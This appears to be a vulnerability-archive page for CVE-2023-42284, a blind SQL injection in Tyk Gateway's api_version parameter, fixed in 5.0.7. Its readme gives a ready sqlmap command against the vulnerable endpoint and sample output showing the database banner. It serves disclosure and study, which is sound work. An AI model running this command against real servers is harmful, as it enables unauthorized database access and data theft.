Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1359 CNY

100%

CVE-2023-42284 PoC — Tyk Gateway 安全漏洞

Source
Associated Vulnerability
Title: Tyk Gateway 安全漏洞 (CVE-2023-42284)
Description:Blind SQL injection in api_version parameter in Tyk Gateway version 5.0.3 allows attacker to access and dump the database via a crafted SQL query.
Description
  Proof of concept for CVE-2023-42284 in Tyk Gateway 
Readme
# Disclaimer
For educational purpose only!

## Details
Proof of concept for CVE-2023-42284.
Tyk Gateway is vulnerable to SQL injection.
Fixed in 5.0.7 version.

The URL parameter ‘api_version’ of the "https://<YOUR_URL>/api/errors/count/...?res=day&p=...&api_version=<PAYLOAD_HERE>&api_id=..."is vulnerable to Blind SQL injection.

## Exploitation

Use sqlmap with following parameters:

```
python.exe .\sqlmap.py -u "https://<INSERT YOUR URL>/api/errors/count/11/8/2022/13/1/2022?res=day&p=-1&api_version=Non%20Versioned&api_id=<INSERT YOUR API_ID>" -p "api_version" --cookie="<INSERT COOKIE HERE> --banner
```

SQL DB banner is returned in response:

```
...
banner: Postgresql 13.01 on x86_64-pc-linux-gnu
...
```
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →